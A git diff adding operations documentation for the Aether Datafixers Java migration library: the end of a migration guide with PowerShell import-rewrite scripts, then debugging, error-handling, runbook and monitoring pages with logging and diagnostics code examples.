+--- + +### PowerShell (Windows) + +```powershell +# GsonOps import +Get-ChildItem -Recurse -Filter *.java | ForEach-Object { + (Get-Content $_.FullName) -replace 'import de\.splatgames\.aether\.datafixers\.codec\.gson\.GsonOps;', 'import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;' | Set-Content $_.FullName +} + +# JacksonOps import +Get-ChildItem -Recurse -Filter *.java | ForEach-Object { + (Get-Content $_.FullName) -replace 'import de\.splatgames\.aether\.datafixers\.codec\.jackson\.JacksonOps;', 'import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;' | Set-Content $_.FullName +} + +# JacksonOps class name +Get-ChildItem -Recurse -Filter *.java | ForEach-Object { + (Get-Content $_.FullName) -replace 'JacksonOps\.INSTANCE', 'JacksonJsonOps.INSTANCE' | Set-Content $_.FullName +} + +# TestData.jackson() +Get-ChildItem -Recurse -Filter *.java | ForEach-Object { + (Get-Content $_.FullName) -replace 'TestData\.jackson\(\)', 'TestData.jacksonJson()' | Set-Content $_.FullName +} +``` + +--- + +## Verification + +### Step 1: Compile-Time Verification + +After applying the migrations, rebuild your project: + +```bash +mvn clean compile +``` + +or + +```bash +./gradlew clean compileJava +``` + +**Expected:** No compilation errors. If you see import errors, you may have missed some files. + +### Step 2: Check for Deprecation Warnings + +Enable deprecation warnings to identify remaining deprecated API usage: + +**Maven:** +```xml + + org.apache.maven.plugins + maven-compiler-plugin + + + -Xlint:deprecation + + + +``` + +**Gradle:** +```groovy +tasks.withType(JavaCompile) { + options.compilerArgs << "-Xlint:deprecation" +} +``` + +Look for warnings like: +``` +warning: [deprecation] all(TypeRewriteRule) in Rules has been deprecated +``` + +These indicate deprecated `Rules` methods that should be updated to include `DynamicOps`. + +### Step 3: Run Tests + +Execute your test suite to verify runtime behavior: + +```bash +mvn test +``` + +or + +```bash +./gradlew test +``` + +### Step 4: Manual Spot Check + +Verify critical migration paths in your application: + +1. Load sample data from v0.5.x +2. Run migrations through your `DataFixer` +3. Verify output matches expected format +4. Check logs for any unexpected warnings + +--- + +## Troubleshooting + +### "Cannot resolve symbol 'JacksonOps'" + +You updated the import but not all usages of the class name. + +**Solution:** Replace `JacksonOps` with `JacksonJsonOps` throughout your code. + +### "Cannot resolve symbol 'GsonOps'" after migration + +Verify your import statement is: +```java +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +``` + +Not the old path: +```java +import de.splatgames.aether.datafixers.codec.gson.GsonOps; +``` + +### Rules not traversing children + +If your `Rules.everywhere()`, `Rules.topDown()`, or similar methods seem to not transform nested data, you're likely using the deprecated single-argument overload. + +**Solution:** Add a `DynamicOps` parameter: +```java +// Before (deprecated, doesn't traverse children) +Rules.everywhere(myRule) + +// After (correct behavior) +Rules.everywhere(GsonOps.INSTANCE, myRule) +``` + +### "TestData.jackson() not found" + +The method was renamed. + +**Solution:** Replace `TestData.jackson()` with `TestData.jacksonJson()`. + +--- + +## Summary Checklist + +- [ ] Update `codec.gson.GsonOps` imports to `codec.json.gson.GsonOps` +- [ ] Update `codec.jackson.JacksonOps` imports to `codec.json.jackson.JacksonJsonOps` +- [ ] Replace `JacksonOps` class references with `JacksonJsonOps` +- [ ] Replace `TestData.jackson()` with `TestData.jacksonJson()` +- [ ] (Optional) Update deprecated `Rules` methods to include `DynamicOps` +- [ ] Rebuild and verify no compilation errors +- [ ] Run test suite +- [ ] Enable deprecation warnings and address remaining issues + +--- + +## Need Help? + +If you encounter issues during migration: + +- Check the [FAQ](../troubleshooting/faq.md) for common questions +- Review [Common Errors](../troubleshooting/common-errors.md) for error messages +- File an issue at [GitHub Issues](https://github.com/aether-framework/aether-datafixers/issues) diff --git a/docs/operations/debugging-guide.md b/docs/operations/debugging-guide.md new file mode 100644 index 0000000..ae8a0f6 --- /dev/null +++ b/docs/operations/debugging-guide.md @@ -0,0 +1,502 @@ +# Debugging Guide + +Systematic approach to diagnosing migration issues in Aether Datafixers. + +## Quick Reference + +| Need | Tool | Configuration | +|--------------------|---------------------|----------------------------| +| Basic logs | SLF4J | Set level to DEBUG | +| Detailed trace | `DiagnosticContext` | Enable with options | +| Per-fix snapshots | `DiagnosticOptions` | `captureSnapshots(true)` | +| Rule-level detail | `DiagnosticOptions` | `captureRuleDetails(true)` | +| Production minimal | `DiagnosticOptions` | `minimal()` preset | + +--- + +## SLF4J Configuration + +### Default Logger Name + +The default logger name for Aether Datafixers is: + +``` +de.splatgames.aether.datafixers +``` + +### Using Slf4jDataFixerContext + +Route datafixer logs through your application's logging framework: + +```java +import de.splatgames.aether.datafixers.core.fix.Slf4jDataFixerContext; + +// Option 1: Default logger name +DataFixerContext context = new Slf4jDataFixerContext(); + +// Option 2: Custom logger name +DataFixerContext context = new Slf4jDataFixerContext("com.myapp.migrations"); + +// Option 3: Existing logger +Logger logger = LoggerFactory.getLogger(MyMigrationService.class); +DataFixerContext context = new Slf4jDataFixerContext(logger); + +// Use in migration +fixer.update(typeRef, data, fromVersion, toVersion, context); +``` + +### Logback Configuration + +```xml + + + + + + %d{HH:mm:ss.SSS} [%thread] %-5level %logger{36} - %msg%n + + + + + + logs/migrations.log + + logs/migrations.%d{yyyy-MM-dd}.log + 30 + + + %d{ISO8601} [%thread] %-5level %logger{36} - %msg%n%ex{full} + + + + + + + + + + + + + + + + +``` + +### Log4j2 Configuration + +```xml + + + + + + + + + + + + + + + + + + + + + + + + + + + +``` + +### Production vs Development Settings + +| Environment | Logger Level | Snapshots | Rule Details | +|-------------|--------------|-----------|--------------| +| Development | DEBUG | Yes | Yes | +| Staging | INFO | Yes | No | +| Production | WARN | No | No | + +--- + +## MigrationReport Diagnostics + +### Enabling Diagnostics + +```java +import de.splatgames.aether.datafixers.api.diagnostic.DiagnosticContext; +import de.splatgames.aether.datafixers.api.diagnostic.DiagnosticOptions; +import de.splatgames.aether.datafixers.api.diagnostic.MigrationReport; + +// Full diagnostics for debugging +DiagnosticContext context = DiagnosticContext.create( + DiagnosticOptions.builder() + .captureSnapshots(true) + .captureRuleDetails(true) + .prettyPrintSnapshots(true) + .build() +); + +// Run migration +Dynamic result = fixer.update(typeRef, data, fromVersion, toVersion, context); + +// Get the report +MigrationReport report = context.getReport(); +``` + +### Report Fields Reference + +| Field | Method | Description | When to Use | +|-----------------|--------------------------|-------------------------|-----------------------| +| Type | `type()` | TypeReference migrated | Always | +| From Version | `fromVersion()` | Source version | Always | +| To Version | `toVersion()` | Target version | Always | +| Duration | `totalDuration()` | Total migration time | Performance issues | +| Fix Count | `fixCount()` | Number of fixes applied | Verify migration path | +| Fix Executions | `fixExecutions()` | Detailed fix list | Tracing issues | +| Rule Count | `ruleApplicationCount()` | Total rules evaluated | Deep debugging | +| Touched Types | `touchedTypes()` | All types processed | Complex migrations | +| Warnings | `warnings()` | Non-fatal issues | Data quality | +| Input Snapshot | `inputSnapshot()` | Data before migration | Transform debugging | +| Output Snapshot | `outputSnapshot()` | Data after migration | Transform debugging | + +### Reading the Report + +```java +MigrationReport report = context.getReport(); + +// Basic summary +System.out.println(report.toSummary()); +// Output: "Migration of 'player' from v100 to v200: 150ms, 5 fixes" + +// Detailed analysis +System.out.println("Type: " + report.type().getId()); +System.out.println("Version: " + report.fromVersion().getVersion() + + " -> " + report.toVersion().getVersion()); +System.out.println("Duration: " + report.totalDuration().toMillis() + "ms"); +System.out.println("Fixes Applied: " + report.fixCount()); +System.out.println("Rules Evaluated: " + report.ruleApplicationCount()); + +// Check for warnings +if (report.hasWarnings()) { + System.out.println("Warnings:"); + for (String warning : report.warnings()) { + System.out.println(" - " + warning); + } +} + +// Snapshots (if enabled) +report.inputSnapshot().ifPresent(snap -> + System.out.println("Input:\n" + snap)); +report.outputSnapshot().ifPresent(snap -> + System.out.println("Output:\n" + snap)); +``` + +--- + +## Tracing Fix Order + +### Understanding Fix Application + +Fixes are applied in version order, from `fromVersion` to `toVersion`. Each fix transforms data from one version to the next. + +``` +v100 ──[Fix A]──> v110 ──[Fix B]──> v150 ──[Fix C]──> v200 +``` + +### Listing Applied Fixes + +```java +MigrationReport report = context.getReport(); + +System.out.println("Applied fixes in order:"); +for (FixExecution fix : report.fixExecutions()) { + System.out.println(fix.toSummary()); + // Output: "rename_field (v100 -> v110): 5ms, 3 rules (2 matched)" +} +``` + +### Detailed Fix Analysis + +```java +for (FixExecution fix : report.fixExecutions()) { + System.out.println("\nFix: " + fix.fixName()); + System.out.println(" Version: " + fix.fromVersion().getVersion() + + " -> " + fix.toVersion().getVersion()); + System.out.println(" Duration: " + fix.durationMillis() + "ms"); + System.out.println(" Rules: " + fix.ruleCount() + + " (" + fix.matchedRuleCount() + " matched)"); + + // Per-fix snapshots + fix.beforeSnapshotOpt().ifPresent(snap -> + System.out.println(" Before: " + snap)); + fix.afterSnapshotOpt().ifPresent(snap -> + System.out.println(" After: " + snap)); + + // Rule-level details (if captureRuleDetails enabled) + for (RuleApplication rule : fix.ruleApplications()) { + System.out.println(" Rule: " + rule.ruleName() + + " on " + rule.typeName() + + " -> " + (rule.matched() ? "MATCHED" : "skipped") + + " (" + rule.durationMillis() + "ms)"); + } +} +``` + +### Finding a Specific Fix + +```java +// Find by name +Optional fix = report.fixExecutions().stream() + .filter(f -> f.fixName().equals("rename_player_field")) + .findFirst(); + +// Find by version +Optional fixAtVersion = report.fixExecutions().stream() + .filter(f -> f.fromVersion().getVersion() == 150) + .findFirst(); +``` + +--- + +## DiagnosticOptions + +### Available Presets + +| Preset | Snapshots | Rule Details | Pretty Print | Use Case | +|--------------|-----------|--------------|--------------|-----------------------| +| `defaults()` | Yes | Yes | Yes | Development debugging | +| `minimal()` | No | No | No | Production monitoring | + +```java +// Full diagnostics (development) +DiagnosticContext devContext = DiagnosticContext.create(DiagnosticOptions.defaults()); + +// Minimal overhead (production) +DiagnosticContext prodContext = DiagnosticContext.create(DiagnosticOptions.minimal()); + +// No diagnostics (maximum performance) +fixer.update(typeRef, data, fromVersion, toVersion); // No context +``` + +### Custom Configuration + +```java +DiagnosticOptions options = DiagnosticOptions.builder() + .captureSnapshots(true) // Enable before/after snapshots + .captureRuleDetails(true) // Enable per-rule tracking + .maxSnapshotLength(10000) // Truncate large snapshots (0 = unlimited) + .prettyPrintSnapshots(true) // Format JSON for readability + .build(); +``` + +### Snapshot Truncation + +Large data structures are truncated to prevent memory issues: + +```java +DiagnosticOptions options = DiagnosticOptions.builder() + .captureSnapshots(true) + .maxSnapshotLength(500) // Truncate to 500 characters + .build(); + +// Truncated snapshots end with "... (truncated)" +``` + +--- + +## Step-by-Step Debugging Workflow + +### 1. Reproduce the Issue + +```java +// Isolate a single problematic record +Dynamic problematicData = loadProblemRecord(); +DataVersion fromVersion = new DataVersion(100); +DataVersion toVersion = new DataVersion(200); +``` + +### 2. Enable Full Diagnostics + +```java +DiagnosticContext context = DiagnosticContext.create( + DiagnosticOptions.builder() + .captureSnapshots(true) + .captureRuleDetails(true) + .prettyPrintSnapshots(true) + .build() +); +``` + +### 3. Run Migration with Diagnostics + +```java +try { + Dynamic result = fixer.update(typeRef, problematicData, fromVersion, toVersion, context); + System.out.println("Migration succeeded"); +} catch (DataFixerException e) { + System.err.println("Migration failed: " + e.getMessage()); +} finally { + // Always get the report (even on failure) + MigrationReport report = context.getReport(); + analyzeReport(report); +} +``` + +### 4. Analyze the Report + +```java +private void analyzeReport(MigrationReport report) { + System.out.println("\n=== Migration Report ==="); + System.out.println(report.toSummary()); + + // Check warnings + if (report.hasWarnings()) { + System.out.println("\nWarnings:"); + report.warnings().forEach(w -> System.out.println(" - " + w)); + } + + // Find slow fixes + System.out.println("\nFix timing:"); + report.fixExecutions().stream() + .sorted((a, b) -> Long.compare(b.durationMillis(), a.durationMillis())) + .forEach(fix -> System.out.println(" " + fix.fixName() + ": " + fix.durationMillis() + "ms")); + + // Check for unmatched rules + long unmatchedRules = report.fixExecutions().stream() + .flatMap(fix -> fix.ruleApplications().stream()) + .filter(rule -> !rule.matched()) + .count(); + System.out.println("\nUnmatched rules: " + unmatchedRules); +} +``` + +### 5. Examine Snapshots + +```java +// Compare before/after for the failing fix +for (FixExecution fix : report.fixExecutions()) { + System.out.println("\n--- " + fix.fixName() + " ---"); + + fix.beforeSnapshotOpt().ifPresent(before -> { + System.out.println("BEFORE:"); + System.out.println(before); + }); + + fix.afterSnapshotOpt().ifPresent(after -> { + System.out.println("AFTER:"); + System.out.println(after); + }); +} +``` + +--- + +## Spring Boot Integration + +### Diagnostics via MigrationService + +```java +@Autowired +private MigrationService migrationService; + +public void migrateWithDiagnostics(TaggedDynamic data) { + DiagnosticContext context = DiagnosticContext.create(DiagnosticOptions.defaults()); + + MigrationResult result = migrationService + .migrate(data) + .from(100) + .to(200) + .withContext(context) + .execute(); + + // Analyze diagnostics + MigrationReport report = context.getReport(); + logReport(report); +} + +private void logReport(MigrationReport report) { + logger.info("Migration: {}", report.toSummary()); + + for (String warning : report.warnings()) { + logger.warn(" Warning: {}", warning); + } + + for (FixExecution fix : report.fixExecutions()) { + logger.debug(" Fix '{}': {}ms, {} rules ({} matched)", + fix.fixName(), + fix.durationMillis(), + fix.ruleCount(), + fix.matchedRuleCount()); + } +} +``` + +### Conditional Diagnostics in Production + +```java +@Value("${aether.datafixers.diagnostics.enabled:false}") +private boolean diagnosticsEnabled; + +public MigrationResult migrate(TaggedDynamic data) { + MigrationService.MigrationBuilder builder = migrationService + .migrate(data) + .from(100) + .to(200); + + if (diagnosticsEnabled) { + DiagnosticContext context = DiagnosticContext.create(DiagnosticOptions.minimal()); + builder.withContext(context); + } + + return builder.execute(); +} +``` + +--- + +## Common Debugging Scenarios + +### Scenario: Migration Produces Wrong Output + +1. Enable snapshots +2. Compare `inputSnapshot` with `outputSnapshot` +3. Check each fix's before/after snapshots +4. Identify which fix introduced the problem + +### Scenario: Migration is Slow + +1. Enable `DiagnosticOptions.minimal()` (low overhead) +2. Check `report.totalDuration()` +3. Sort fixes by duration +4. Profile the slowest fix + +```java +report.fixExecutions().stream() + .sorted((a, b) -> Long.compare(b.durationMillis(), a.durationMillis())) + .limit(5) + .forEach(fix -> System.out.println(fix.fixName() + ": " + fix.durationMillis() + "ms")); +``` + +### Scenario: Warning During Migration + +1. Check `report.warnings()` +2. Enable rule details to see which rule emitted the warning +3. Review the fix implementation for `context.warn()` calls + +--- + +## Related + +- [Error Scenarios](error-scenarios.md) — Exception handling reference +- [How to Use Diagnostics](../how-to/use-diagnostics.md) — Full API reference +- [How to Debug Migrations](../how-to/debug-migrations.md) — Basic debugging tips +- [Monitoring & Alerting](monitoring-alerting.md) — Production monitoring diff --git a/docs/operations/error-scenarios.md b/docs/operations/error-scenarios.md new file mode 100644 index 0000000..2613a62 --- /dev/null +++ b/docs/operations/error-scenarios.md @@ -0,0 +1,459 @@ +# Error Scenarios + +Detailed guide to handling exceptions in Aether Datafixers production environments. + +## Exception Hierarchy Quick Reference + +| Exception | Context Fields | Common Causes | +|----------------------|--------------------------------------------------------|---------------------------| +| `DataFixerException` | `context` | Base class for all errors | +| `FixException` | `fixName`, `fromVersion`, `toVersion`, `typeReference` | Fix logic failure | +| `DecodeException` | `typeReference`, `path` | Invalid input data | +| `EncodeException` | `typeReference`, `failedValue` | Serialization failure | +| `RegistryException` | `missingType`, `missingVersion` | Missing registration | + +All exceptions extend `RuntimeException` (unchecked) and are immutable/thread-safe. + +--- + +## FixException + +Thrown when a DataFix fails to transform data from one version to another. + +### Context Fields + +| Field | Accessor | Description | +|-----------------|----------------------|-----------------------------| +| `fixName` | `getFixName()` | Name of the fix that failed | +| `fromVersion` | `getFromVersion()` | Source version of migration | +| `toVersion` | `getToVersion()` | Target version of migration | +| `typeReference` | `getTypeReference()` | Type being transformed | + +### Context String Format + +``` +fix=rename_player_name, version=100->200, type=player +``` + +### Common Causes + +1. **Invalid input data** — Data doesn't match expected schema +2. **Missing required field** — Fix expects a field that doesn't exist +3. **Type mismatch** — Expected string but found number +4. **Rule application failure** — TypeRewriteRule failed to apply +5. **Null pointer** — Fix logic encountered null unexpectedly + +### Resolution Steps + +```java +try { + Dynamic result = fixer.update(typeRef, data, fromVersion, toVersion); +} catch (FixException e) { + // 1. Log with full context + logger.error("Migration failed: {} [{}]", e.getMessage(), e.getContext()); + + // 2. Extract specific fields for analysis + if (e.getFixName() != null) { + logger.error(" Fix: {}", e.getFixName()); + } + if (e.getFromVersion() != null && e.getToVersion() != null) { + logger.error(" Version: {} -> {}", + e.getFromVersion().getVersion(), + e.getToVersion().getVersion()); + } + if (e.getTypeReference() != null) { + logger.error(" Type: {}", e.getTypeReference().getId()); + } + + // 3. Check root cause + if (e.getCause() != null) { + logger.error(" Root cause: {}", e.getCause().getMessage()); + } +} +``` + +### Diagnostic Integration + +```java +// Use DiagnosticContext to capture snapshots +DiagnosticContext ctx = DiagnosticContext.create( + DiagnosticOptions.builder() + .captureSnapshots(true) + .build() +); + +try { + fixer.update(typeRef, data, fromVersion, toVersion, ctx); +} catch (FixException e) { + MigrationReport report = ctx.getReport(); + + // Find which fix ran last (the one that failed) + List fixes = report.fixExecutions(); + if (!fixes.isEmpty()) { + FixExecution lastFix = fixes.get(fixes.size() - 1); + logger.error("Last fix before failure: {}", lastFix.fixName()); + lastFix.beforeSnapshotOpt().ifPresent(snap -> + logger.error("Data before fix: {}", snap)); + } +} +``` + +--- + +## DecodeException + +Thrown when deserialization from Dynamic to typed Java object fails. + +### Context Fields + +| Field | Accessor | Description | +|-----------------|----------------------|-------------------------------------------| +| `typeReference` | `getTypeReference()` | Type being decoded | +| `path` | `getPath()` | Location in data structure (dot notation) | + +### Context String Format + +``` +type=player, path=inventory[0].item.name +``` + +### Path Notation + +The path uses dot notation with array indices: +- `player.name` — Field `name` in object `player` +- `inventory[0]` — First element of array `inventory` +- `inventory[0].item.damage` — Nested field access + +### Common Causes + +1. **Missing required field** — Schema expects field that doesn't exist +2. **Invalid field type** — Expected number, got string +3. **Malformed data** — Corrupt or truncated input +4. **Schema mismatch** — Data version doesn't match expected schema +5. **Null value** — Non-nullable field is null + +### Resolution Steps + +```java +try { + Typed typed = fixer.decode(version, typeRef, dynamic); +} catch (DecodeException e) { + logger.error("Decode failed: {} [{}]", e.getMessage(), e.getContext()); + + // Path tells you exactly where the problem is + if (e.getPath() != null) { + logger.error("Problem location: {}", e.getPath()); + + // Navigate to the problematic field + String[] pathParts = e.getPath().split("\\."); + Dynamic current = dynamic; + for (String part : pathParts) { + if (part.contains("[")) { + // Array access + String fieldName = part.substring(0, part.indexOf('[')); + int index = Integer.parseInt( + part.substring(part.indexOf('[') + 1, part.indexOf(']'))); + current = current.get(fieldName).get(index); + } else { + current = current.get(part); + } + logger.debug(" {} = {}", part, current.getValue()); + } + } +} +``` + +### Data Inspection + +```java +// Inspect the raw data at the failing path +DecodeException e = ...; +if (e.getPath() != null && e.getPath().contains(".")) { + String parentPath = e.getPath().substring(0, e.getPath().lastIndexOf('.')); + String fieldName = e.getPath().substring(e.getPath().lastIndexOf('.') + 1); + + logger.error("Parent object fields at '{}': {}", parentPath, + navigateTo(dynamic, parentPath).asMap().keySet()); +} +``` + +--- + +## EncodeException + +Thrown when serialization from Java object to Dynamic representation fails. + +### Context Fields + +| Field | Accessor | Description | +|-----------------|----------------------|-----------------------------| +| `typeReference` | `getTypeReference()` | Type being encoded | +| `failedValue` | `getFailedValue()` | Value that failed to encode | + +### Context String Format + +``` +type=player +``` + +### Common Causes + +1. **Null value** — Required field is null +2. **Unsupported type** — Codec doesn't support the value type +3. **Codec misconfiguration** — Encoder not properly set up +4. **Circular reference** — Object graph contains cycles + +### Resolution Steps + +```java +try { + Dynamic encoded = fixer.encode(version, typeRef, value, ops); +} catch (EncodeException e) { + logger.error("Encode failed: {} [{}]", e.getMessage(), e.getContext()); + + // Inspect the failed value (be careful with sensitive data) + if (e.getFailedValue() != null) { + logger.error("Failed value class: {}", e.getFailedValue().getClass().getName()); + // Only log non-sensitive values + if (isSafeToLog(e.getFailedValue())) { + logger.error("Failed value: {}", e.getFailedValue()); + } + } + + // Check if it's a null issue + if (e.getCause() instanceof NullPointerException) { + logger.error("Null value encountered - check required fields"); + } +} +``` + +### Sensitive Data Warning + +The `failedValue` may contain sensitive information (passwords, tokens, PII). Always sanitize before logging: + +```java +private boolean isSafeToLog(Object value) { + // Don't log objects that might contain sensitive data + if (value instanceof String) { + String str = (String) value; + return str.length() < 100 && !str.toLowerCase().contains("password"); + } + return value instanceof Number || value instanceof Boolean; +} +``` + +--- + +## RegistryException + +Thrown when a registry lookup fails (type, schema, or codec not found). + +### Context Fields + +| Field | Accessor | Description | +|------------------|-----------------------|-------------------------| +| `missingType` | `getMissingType()` | TypeReference not found | +| `missingVersion` | `getMissingVersion()` | DataVersion not found | + +### Context String Format + +``` +type=custom_entity, version=150 +``` + +### Common Causes + +1. **Type not registered** — Forgot to register type in bootstrap +2. **Schema not registered** — Version not registered in SchemaRegistry +3. **Version gap** — No schema exists for intermediate version +4. **Typo in TypeReference** — Type ID doesn't match registration + +### Resolution Steps + +```java +try { + Schema schema = schemaRegistry.require(version); +} catch (RegistryException e) { + logger.error("Registry lookup failed: {} [{}]", e.getMessage(), e.getContext()); + + if (e.getMissingVersion() != null) { + logger.error("Missing schema for version: {}", + e.getMissingVersion().getVersion()); + + // List available versions + logger.info("Available versions: {}", + schemaRegistry.getVersions().stream() + .map(v -> String.valueOf(v.getVersion())) + .collect(Collectors.joining(", "))); + } + + if (e.getMissingType() != null) { + logger.error("Missing type: {}", e.getMissingType().getId()); + + // List registered types (at current version if available) + logger.info("Registered types: {}", + typeRegistry.getRegisteredTypes().stream() + .map(TypeReference::getId) + .collect(Collectors.joining(", "))); + } +} +``` + +### Bootstrap Verification Checklist + +When encountering RegistryException: + +- [ ] Check `registerSchemas()` includes the required version +- [ ] Check type is registered in the schema for that version +- [ ] Verify no gaps in version chain (e.g., 100 -> 200 needs fixes, not just schemas) +- [ ] Check for typos in TypeReference IDs +- [ ] Verify bootstrap is loaded (not null) + +--- + +## Schema Mismatch Scenarios + +### Data Version Doesn't Match Expected + +**Symptom**: Migration produces unexpected results or fails silently. + +**Detection**: + +```java +// Check data version before migration +Optional dataVersion = dynamic.get("_version").asNumber() + .map(Number::intValue); + +if (dataVersion.isEmpty()) { + logger.warn("Data has no version field - assuming oldest version"); +} + +int fromVersion = dataVersion.orElse(OLDEST_VERSION); +if (fromVersion > currentVersion.getVersion()) { + throw new IllegalStateException( + "Data version " + fromVersion + " is newer than current " + currentVersion); +} +``` + +### Type Structure Changed Without Fix + +**Symptom**: Fields missing or have wrong type after migration. + +**Detection**: + +```java +// Use SchemaValidator to detect coverage gaps +ValidationResult result = SchemaValidator.forBootstrap(bootstrap) + .validateFixCoverage() + .validate(); + +if (!result.isValid()) { + for (String error : result.getErrors()) { + logger.error("Schema validation error: {}", error); + } +} +``` + +**Resolution**: Write a DataFix to handle the schema change. + +--- + +## Extracting Exception Context + +### Complete Context Extraction + +```java +public class ExceptionAnalyzer { + + public static void logException(DataFixerException e) { + StringBuilder sb = new StringBuilder(); + sb.append("Exception: ").append(e.getClass().getSimpleName()).append("\n"); + sb.append("Message: ").append(e.getMessage()).append("\n"); + + if (e.getContext() != null) { + sb.append("Context: ").append(e.getContext()).append("\n"); + } + + // Type-specific extraction + if (e instanceof FixException fix) { + if (fix.getFixName() != null) { + sb.append("Fix Name: ").append(fix.getFixName()).append("\n"); + } + if (fix.getFromVersion() != null) { + sb.append("From Version: ").append(fix.getFromVersion().getVersion()).append("\n"); + } + if (fix.getToVersion() != null) { + sb.append("To Version: ").append(fix.getToVersion().getVersion()).append("\n"); + } + if (fix.getTypeReference() != null) { + sb.append("Type: ").append(fix.getTypeReference().getId()).append("\n"); + } + } else if (e instanceof DecodeException decode) { + if (decode.getTypeReference() != null) { + sb.append("Type: ").append(decode.getTypeReference().getId()).append("\n"); + } + if (decode.getPath() != null) { + sb.append("Path: ").append(decode.getPath()).append("\n"); + } + } else if (e instanceof EncodeException encode) { + if (encode.getTypeReference() != null) { + sb.append("Type: ").append(encode.getTypeReference().getId()).append("\n"); + } + // Be careful with failedValue - may contain sensitive data + } else if (e instanceof RegistryException registry) { + if (registry.getMissingType() != null) { + sb.append("Missing Type: ").append(registry.getMissingType().getId()).append("\n"); + } + if (registry.getMissingVersion() != null) { + sb.append("Missing Version: ").append(registry.getMissingVersion().getVersion()).append("\n"); + } + } + + // Root cause chain + Throwable cause = e.getCause(); + int depth = 0; + while (cause != null && depth < 5) { + sb.append("Caused by: ").append(cause.getClass().getSimpleName()) + .append(": ").append(cause.getMessage()).append("\n"); + cause = cause.getCause(); + depth++; + } + + System.err.println(sb); + } +} +``` + +### Logging Pattern for Production + +```xml + +%d{ISO8601} [%thread] %-5level %logger{36} - %msg%n%ex{full} +``` + +```java +// Structured logging with MDC +import org.slf4j.MDC; + +try { + fixer.update(typeRef, data, fromVersion, toVersion); +} catch (FixException e) { + MDC.put("fix_name", e.getFixName()); + MDC.put("from_version", String.valueOf(e.getFromVersion())); + MDC.put("to_version", String.valueOf(e.getToVersion())); + MDC.put("type", e.getTypeReference() != null ? e.getTypeReference().getId() : "unknown"); + + logger.error("Migration failed", e); + + MDC.clear(); +} +``` + +--- + +## Related + +- [Debugging Guide](debugging-guide.md) — Systematic debugging approach +- [Recovery Procedures](recovery-procedures.md) — How to recover from failures +- [Common Errors](../troubleshooting/common-errors.md) — Quick error reference +- [How to Use Diagnostics](../how-to/use-diagnostics.md) — Diagnostic API reference diff --git a/docs/operations/index.md b/docs/operations/index.md new file mode 100644 index 0000000..9de9d5e --- /dev/null +++ b/docs/operations/index.md @@ -0,0 +1,128 @@ +# Operations Runbook + +Operational guidance for running Aether Datafixers in production environments. This runbook covers error handling, debugging, monitoring, and recovery procedures. + +## Quick Reference + +| Scenario | Document | Key Actions | +|--------------------------------|-------------------------------------------------|---------------------------------------| +| Migration fails with exception | [Error Scenarios](error-scenarios.md) | Extract context, check exception type | +| Need detailed migration trace | [Debugging Guide](debugging-guide.md) | Enable `DiagnosticContext` | +| Set up production monitoring | [Monitoring & Alerting](monitoring-alerting.md) | Configure Micrometer metrics | +| Partial migration / data loss | [Recovery Procedures](recovery-procedures.md) | Restore from backup, retry | + +## Documentation Structure + +### [Error Scenarios](error-scenarios.md) + +Exception handling reference for production troubleshooting: +- Exception hierarchy and context fields +- `FixException` — Migration logic failures +- `DecodeException` — Deserialization failures +- `EncodeException` — Serialization failures +- `RegistryException` — Missing type or version +- Schema mismatch detection and resolution + +### [Debugging Guide](debugging-guide.md) + +Systematic approach to diagnosing migration issues: +- SLF4J configuration (Logback, Log4j2) +- Using `MigrationReport` for diagnostics +- Tracing fix application order +- Step-by-step debugging workflow + +### [Monitoring & Alerting](monitoring-alerting.md) + +Production monitoring setup: +- Micrometer metrics reference +- Recommended alert thresholds +- Prometheus alerting rules +- Grafana dashboard templates +- Actuator health integration + +### [Recovery Procedures](recovery-procedures.md) + +Handling failures and data recovery: +- Backup recommendations +- Partial migration recovery +- Rollback strategies +- Incident response workflows + +--- + +## Emergency Response + +### Migration Completely Failed + +1. **Check metrics** — Look at `aether.datafixers.migrations.failure` counter +2. **Extract context** — See [Error Scenarios](error-scenarios.md#extracting-exception-context) +3. **Enable DEBUG** — Set log level for `de.splatgames.aether.datafixers` +4. **Capture diagnostics** — Use `DiagnosticContext` on a sample record +5. **Restore if needed** — See [Recovery Procedures](recovery-procedures.md) + +### High Failure Rate Alert + +1. **Check error breakdown** — Query failures by `error_type` tag +2. **Identify pattern** — Same exception? Same data version? +3. **Isolate bad records** — Query for records at problematic version +4. **Apply targeted fix** — Fix data or code, retry migration + +### Slow Migration Alert + +1. **Check version span** — Large version jumps take longer +2. **Profile fixes** — Use `MigrationReport.fixExecutions()` timing +3. **Check data size** — Large objects slow down processing +4. **Consider batching** — Process in smaller batches + +--- + +## Health Checks + +### Actuator Endpoints + +| Endpoint | Purpose | +|------------------------|---------------------------| +| `/actuator/health` | UP/DOWN status per domain | +| `/actuator/info` | Version information | +| `/actuator/datafixers` | Detailed domain status | +| `/actuator/prometheus` | Metrics export | + +### Kubernetes Probes + +```yaml +livenessProbe: + httpGet: + path: /actuator/health/liveness + port: 8080 + initialDelaySeconds: 30 + periodSeconds: 10 + +readinessProbe: + httpGet: + path: /actuator/health/readiness + port: 8080 + initialDelaySeconds: 10 + periodSeconds: 5 +``` + +--- + +## Key Metrics Overview + +| Metric | Type | Alert Threshold | +|---------------------------------------------|--------------|-----------------| +| `aether.datafixers.migrations.success` | Counter | — | +| `aether.datafixers.migrations.failure` | Counter | > 0 per minute | +| `aether.datafixers.migrations.duration` | Timer | p99 > 1s | +| `aether.datafixers.migrations.version.span` | Distribution | avg > 50 | + +See [Monitoring & Alerting](monitoring-alerting.md) for complete metrics reference. + +--- + +## Related + +- [Troubleshooting](../troubleshooting/index.md) — Basic troubleshooting tips +- [Spring Boot Metrics](../spring-boot/metrics.md) — Detailed metrics reference +- [Spring Boot Actuator](../spring-boot/actuator.md) — Actuator integration +- [How to Use Diagnostics](../how-to/use-diagnostics.md) — Diagnostic API reference diff --git a/docs/operations/monitoring-alerting.md b/docs/operations/monitoring-alerting.md new file mode 100644 index 0000000..2c0b9ae --- /dev/null +++ b/docs/operations/monitoring-alerting.md @@ -0,0 +1,646 @@ +# Monitoring & Alerting + +Production monitoring setup for Aether Datafixers using Micrometer, Prometheus, and Grafana. + +## Metric Quick Reference + +| Metric | Type | Tags | Alert Threshold | Description | +|---------------------------------------------|--------------|------------------------|-----------------|-----------------------| +| `aether.datafixers.migrations.success` | Counter | `domain` | — | Successful migrations | +| `aether.datafixers.migrations.failure` | Counter | `domain`, `error_type` | > 0/min | Failed migrations | +| `aether.datafixers.migrations.duration` | Timer | `domain` | p99 > 1s | Execution time | 